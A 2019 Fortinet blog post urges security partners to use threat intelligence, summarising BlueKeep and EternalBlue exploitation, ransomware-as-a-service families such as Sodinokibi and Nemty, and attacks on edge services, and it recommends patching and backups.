How Partners Can Leverage Threat Intelligence to Better Protect Customers

By Anthony Giandomenico | December 30, 2019

As customers continue to expand their service offerings to stay competitive in the growing digital economy, partners must gather and use up-to-date threat intelligence to protect them from potential risk. Analyzing this information is the key for partner security teams to build sophisticated security strategies that address the evolving cyber risks their customers face. This not only allows partners to effectively manage today’s threats, but also enables them to offer comprehensive security solutions in the future.

When monitoring threat activity, it’s important for partners to examine relevant trends within the cyber landscape, enabling them to better identify the risks these threats pose to customer security. With that in mind, the Q3 Fortinet Threat Landscape Report identified several prevalent threats that partners should be monitoring and incorporating into their security solutions and strategies.

BlueKeep and EternalBlue Vulnerabilities Continue to be Exploited

The BlueKeep vulnerability continued to pose a significant threat to users over the past quarter as it has for many months now. Similarly, attackers continued to target systems that are vulnerable to the EternalBlue exploit as well. Just as with BlueKeep, this exploit allows attackers to remotely take complete control of a vulnerable system and execute the code of their choice on it. These attributes have made this attack technique particularly attractive to cyber criminals looking to carry out malware attacks on business networks, making it a priority for partners to examine.

The continued threat activity surrounding BlueKeep and EternalBlue outlines the importance of patching system vulnerabilities. In Q3 of 2019, there were more attempts targeting vulnerabilities from 2007 than from 2018 and 2019 combined. With this in mind, it is essential that partners work with customers to review their cyber hygiene strategies to prioritize, and where possible, even automate the patching and upgrading of all vulnerable devices, no matter how old. Of course, in many instances, patching or replacing devices is easier said than done. Some, for example, are embedded in 24/7 installations that simply cannot be taken offline for any reason. In such circumstances, organizations may need additional help in designing and implementing proximity controls and zero-trust access to mitigate the compromise of existing or future vulnerabilities.

Ransomware-as-a-Service is Gaining Ground

Over the past few years, cyber criminals have been used Ransomware-as-a-Service (RaaS) to facilitate attacks and increase revenue. What makes this attack model particularly dangerous is that it enables cyber criminals to carry out large scale targeted attacks with relative ease and little actual technical skill. Which is why this attack strategy continues to grow. In Q3, for example, the FortiGuard Labs team detected two new malware families moving to a RaaS model; Sodinokibi and Nemty. These ransomware variants have been used to target large scale organizations, and their new RaaS service model means organizations are likely to see a spike in such activity over the next year or so.

The rapid growth of both Sodinokibi and Nemty demonstrates the clear danger that malware poses to enterprise organizations. Along with this, the financial success of these malware families will not only encourage cyber criminals to begin utilizing RaaS solutions, but we should see more threat developers adopting this model as well.

This brings up an important point about mitigating the risk that malware poses. Defending against RaaS requires partners to take a proactive approach to security that goes beyond just identifying and addressing current ransomware threats. Protecting customers from ransomware requires continual evaluation of emerging trends to determine the risk they pose, as well as identify what needs to be done to prevent current and future attacks, including guiding customers through a complete ransomware strategy that includes enhanced security combined with practical actions such as regularly backing up systems, keeping backups stored off-network along with essential hardware and software needed for a recovery, and regularly running recovery drills so downtime after an attack is reduced to a minimum.

Cybercriminals Are Targeting Edge Services

Because over 90% of malware is still delivered via email, many organizations have responded by aggressively focusing on training users to identify phishing emails and not click on email attachments. They are also more aware of the importance of email security solutions. As a result, criminals have attempted to maximize all alternatives with their tactics by simply targeting other areas of the attack surface that might not be as closely paid attention to.

For example, over the past quarter FortiGuard Labs has observed attacks targeting publicly available edge services with remote code execution exploits. Once criminals establish a foothold at the edge, they then use that attack vector to begin delivering their malware to targets inside the network, with the same result as having used phishing to deliver those same payloads.

This particular vector is not new, but the shifting of focus is noteworthy.

Final Thoughts

Q3 of 2019 saw a large number cyber criminals exploiting system vulnerabilities, especially older system weaknesses, to gain access to critical infrastructures and launch attacks. Partners must work closely with customers on issues such as vulnerability management, as this will directly impact the effectiveness of the security solutions they implement. Moreover, keeping customers informed of the latest cyber threat trends plays a major role in the quality of service partners can offer, and the overall security of customers, and further establishes the partner’s role as a critical member of the customer’s security team.

Read more about the latest cybersecurity threat trends and the rapidly evolving threat landscape in our latest Quarterly Threat Landscape Report.